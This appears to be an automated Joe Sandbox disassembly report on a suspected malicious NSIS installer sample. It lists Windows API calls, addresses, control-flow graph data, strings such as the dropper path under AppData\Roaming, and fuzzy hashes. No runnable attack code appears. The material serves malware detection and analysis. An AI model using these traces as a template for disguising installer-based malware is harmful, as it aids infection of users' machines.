                                                  • GetDlgItem.USER32(?,00000408), ref: 00404C85
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCF
                                                  • LoadBitmapW.USER32(0000006E), ref: 00404CE2
                                                  • SetWindowLongW.USER32(?,000000FC,0040525A), ref: 00404CFB
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0F
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D21
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404D37
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D43
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D55
                                                  • DeleteObject.GDI32(00000000), ref: 00404D58
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D83
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8F
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E25
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E50
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E64
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404E93
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA1
                                                  • ShowWindow.USER32(?,00000005), ref: 00404EB2
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAF
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405014
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405029
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040504D
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040506D
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00405082
                                                  • GlobalFree.KERNEL32(?), ref: 00405092
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0040510B
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 004051B4
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C3
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004051E3
                                                  • ShowWindow.USER32(?,00000000), ref: 00405231
                                                  • GetDlgItem.USER32(?,000003FE), ref: 0040523C
                                                  • ShowWindow.USER32(00000000), ref: 00405243
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                  • String ID: $M$N
                                                  • API String ID: 1638840714-813528018
                                                  • Opcode ID: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                  • Instruction ID: ace54df752983209bd77257c2b819bbd2f8b8ae60686516a6448f39b7f2ae2b0
                                                  • Opcode Fuzzy Hash: b7a53bb0e8129e8d6f105adc399685baa7110aa9d584893a6364e795e1a80ea2
                                                  • Instruction Fuzzy Hash: E50270B0900209EFDB109FA4DD85AAE7BB5FB84314F10817AF650BA2E1D7799D42CF58

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 570 405990-4059b6 call 405c5b 573 4059b8-4059ca DeleteFileW 570->573 574 4059cf-4059d6 570->574 575 405b4c-405b50 573->575 576 4059d8-4059da 574->576 577 4059e9-4059f9 call 406282 574->577 578 4059e0-4059e3 576->578 579 405afa-405aff 576->579 583 405a08-405a09 call 405b9f 577->583 584 4059fb-405a06 lstrcatW 577->584 578->577 578->579 579->575 582 405b01-405b04 579->582 585 405b06-405b0c 582->585 586 405b0e-405b16 call 4065c5 582->586 587 405a0e-405a12 583->587 584->587 585->575 586->575 593 405b18-405b2c call 405b53 call 405948 586->593 591 405a14-405a1c 587->591 592 405a1e-405a24 lstrcatW 587->592 591->592 594 405a29-405a45 lstrlenW FindFirstFileW 591->594 592->594 610 405b44-405b47 call 4052e6 593->610 611 405b2e-405b31 593->611 595 405a4b-405a53 594->595 596 405aef-405af3 594->596 598 405a73-405a87 call 406282 595->598 599 405a55-405a5d 595->599 596->579 601 405af5 596->601 612 405a89-405a91 598->612 613 405a9e-405aa9 call 405948 598->613 602 405ad2-405ae2 FindNextFileW 599->602 603 405a5f-405a67 599->603 601->579 602->595 609 405ae8-405ae9 FindClose 602->609 603->598 606 405a69-405a71 603->606 606->598 606->602 609->596 610->575 611->585 614 405b33-405b42 call 4052e6 call 406048 611->614 612->602 615 405a93-405a9c call 405990 612->615 623 405aca-405acd call 4052e6 613->623 624 405aab-405aae 613->624 614->575 615->602 623->602 627 405ab0-405ac0 call 4052e6 call 406048 624->627 628 405ac2-405ac8 624->628 627->602 628->602
                                                  APIs
                                                  • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059B9
                                                  • lstrcatW.KERNEL32(0042F250,\*.*,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A01
                                                  • lstrcatW.KERNEL32(?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A24
                                                  • lstrlenW.KERNEL32(?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A2A
                                                  • FindFirstFileW.KERNELBASE(0042F250,?,?,?,0040A014,?,0042F250,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A3A
                                                  • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ADA
                                                  • FindClose.KERNEL32(00000000), ref: 00405AE9
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040599E
                                                  • "C:\Users\user\Desktop\3507071243740008011.exe", xrefs: 00405990
                                                  • \*.*, xrefs: 004059FB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-3701117409
                                                  • Opcode ID: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                  • Instruction ID: f2c7612d72ec45a398f238805cdec5f3e53338685f49ce317d80e039c8d46841
                                                  • Opcode Fuzzy Hash: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
                                                  • Instruction Fuzzy Hash: 4E41C230A01A14AACB21AB658C89AAF7778DF81764F14427FF801711C1D77CA992DE6E
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,00430298,0042FA50,00405CA4,0042FA50,0042FA50,00000000,0042FA50,0042FA50,?,?,74DF3420,004059B0,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 004065D0
                                                  • FindClose.KERNEL32(00000000), ref: 004065DC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                  • Instruction ID: c6d438537f48b5b2fd9a798109b403d1ef13146c040350fe47557a90c5bdf24f
                                                  • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                  • Instruction Fuzzy Hash: E6D012315091206BC6551B387E0C84B7A589F153717258B37B86AF11E4C734CC628698

                                                  Control-flow Graph

                                                  • Executed
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D7A
                                                  • ShowWindow.USER32(?), ref: 00403D97
                                                  • DestroyWindow.USER32 ref: 00403DAB
                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DC7
                                                  • GetDlgItem.USER32(?,?), ref: 00403DE8
                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DFC
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403E03
                                                  • GetDlgItem.USER32(?,00000001), ref: 00403EB1
                                                  • GetDlgItem.USER32(?,00000002), ref: 00403EBB
                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403ED5
                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F26
                                                  • GetDlgItem.USER32(?,00000003), ref: 00403FCC
                                                  • ShowWindow.USER32(00000000,?), ref: 00403FED
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FFF
                                                  • EnableWindow.USER32(?,?), ref: 0040401A
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404030
                                                  • EnableMenuItem.USER32(00000000), ref: 00404037
                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040404F
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404062
                                                  • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 0040408C
                                                  • SetWindowTextW.USER32(?,0042D248), ref: 004040A0
                                                  • ShowWindow.USER32(?,0000000A), ref: 004041D4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID:
                                                  • API String ID: 3282139019-0
                                                  • Opcode ID: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
                                                  • Instruction ID: 2b8d66c2e1a38ac8fa8a62e4dcdff4cf04ad9fa750ea4aef2484392c4ac96c84
                                                  • Opcode Fuzzy Hash: d98e6c65d60d857f3aa4eca315e3afb6b45dd94bb5928597cafe6023f70925fc
                                                  • Instruction Fuzzy Hash: 3EC1D2B1600200AFDB216F61ED89E2B3A68FB94706F04057EF641B51F1CB799982DB6D

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0040665C: GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                    • Part of subcall function 0040665C: GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                  • lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\3507071243740008011.exe",00000000), ref: 00403A11
                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A91
                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\pechay\transskribere\jon,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403AA4
                                                  • GetFileAttributesW.KERNEL32(Call), ref: 00403AAF
                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\pechay\transskribere\jon), ref: 00403AF8
                                                    • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                  • RegisterClassW.USER32(00433E80), ref: 00403B35
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B4D
                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B82
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403BB8
                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BE4
                                                  • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403BF1
                                                  • RegisterClassW.USER32(00433E80), ref: 00403BFA
                                                  • DialogBoxParamW.USER32(?,00000000,00403D3E,00000000), ref: 00403C19
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\pechay\transskribere\jon$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                  • API String ID: 1975747703-971695124
                                                  • Opcode ID: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                  • Instruction ID: b69a5953a59a380dedfc974e339360e26c19c43312473aa69c5b527d033ca56b
                                                  • Opcode Fuzzy Hash: d13a808758802c6e3fc48dc76d19d1d1e2605ae81d2ad2d57bfa7261d619400b
                                                  • Instruction Fuzzy Hash: 7061A8312003006ED320BF669D46F673A6CEB84B5AF40053FF945B62E2DB7DA9418A2D

                                                  Control-flow Graph

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402ED2
                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\3507071243740008011.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE
                                                    • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                    • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                  • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\3507071243740008011.exe,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\3507071243740008011.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 4283519449-3274353692
                                                  • Opcode ID: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                  • Instruction ID: 5fb561c1f1da7fe65fe29aa304fda9dad36d264b5387f138e6185790fd874317
                                                  • Opcode Fuzzy Hash: 63e69acdaec1fdaba5d4a89e2a3b5318abe59b2b0843af0c7679ee6c60d0c948
                                                  • Instruction Fuzzy Hash: 18510471902216AFDB20AF64DD85B9E7EB8FB00359F15403BF904B62C5C7789E408B6C

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E5
                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004063F8
                                                  • SHGetSpecialFolderLocation.SHELL32(0040531D,0041D800,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 00406434
                                                  • SHGetPathFromIDListW.SHELL32(0041D800,Call), ref: 00406442
                                                  • CoTaskMemFree.OLE32(0041D800), ref: 0040644D
                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
                                                  • lstrlenW.KERNEL32(Call,00000000,0042C228,?,0040531D,0042C228,00000000), ref: 004064CB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                  • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 717251189-1230650788
                                                  • Opcode ID: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                  • Instruction ID: 2bc9f3e321a063d065e255e84c3e845f89f4622f689527909a28eedc1d3cb15f
                                                  • Opcode Fuzzy Hash: 5757adc76ebd299de9e3f21c9246a654aa3bace2b5e710508428971d5ba8c1fc
                                                  • Instruction Fuzzy Hash: 1D613631A00205ABDF209F64CD41ABE37A5AF44318F16813FE947B62D1D77C5AA1CB9D

                                                  Control-flow Graph

                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular,?,?,00000031), ref: 004017B0
                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular,?,?,00000031), ref: 004017D5
                                                    • Part of subcall function 00406282: lstrcpynW.KERNEL32(?,?,00000400,00403444,00433EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 0040628F
                                                    • Part of subcall function 004052E6: lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                    • Part of subcall function 004052E6: lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                    • Part of subcall function 004052E6: lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                    • Part of subcall function 004052E6: SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                    • Part of subcall function 004052E6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                    • Part of subcall function 004052E6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                    • Part of subcall function 004052E6: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsy62D9.tmp$C:\Users\user\AppData\Local\Temp\nsy62D9.tmp\System.dll$C:\Users\user\AppData\Roaming\pechay\transskribere\jon\Ossicular$Call
                                                  • API String ID: 1941528284-3220870226
                                                  • Opcode ID: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                  • Instruction ID: 71989b97474780e21d9e3883d12846d469cfbdfaa42366440e3466e884ca0043
                                                  • Opcode Fuzzy Hash: 5b350da25249687dd4719405322e9856b363981bc1dd38a50fc9a6532880dae0
                                                  • Instruction Fuzzy Hash: C1419431900518BECF11BBA5DC46DAF3679EF45328F20423FF412B50E1DA3C8A519A6D

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CountTick$wsprintf
                                                  • String ID: ... %d%%$@
                                                  • API String ID: 551687249-3859443358
                                                  • Opcode ID: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                  • Instruction ID: f75c430432033e5046526aed0a4a2f939c591a2e87bafbbe4e5c1659d7ec9983
                                                  • Opcode Fuzzy Hash: bcadc4b8fcc5a9726af7f1001a2bc5a9f2fe7a461361550fb019878be66ece88
                                                  • Instruction Fuzzy Hash: 85515A71900219EBDB10CF69DA84B9E7FA8AF45366F14417BEC14B72C0C778DA50CBA9

                                                  Control-flow Graph (legend: Executed / Not Executed; graph data not reproduced)
                                                  APIs
                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B0
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                  • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                    • Part of subcall function 00405E55: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E6B
                                                  • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
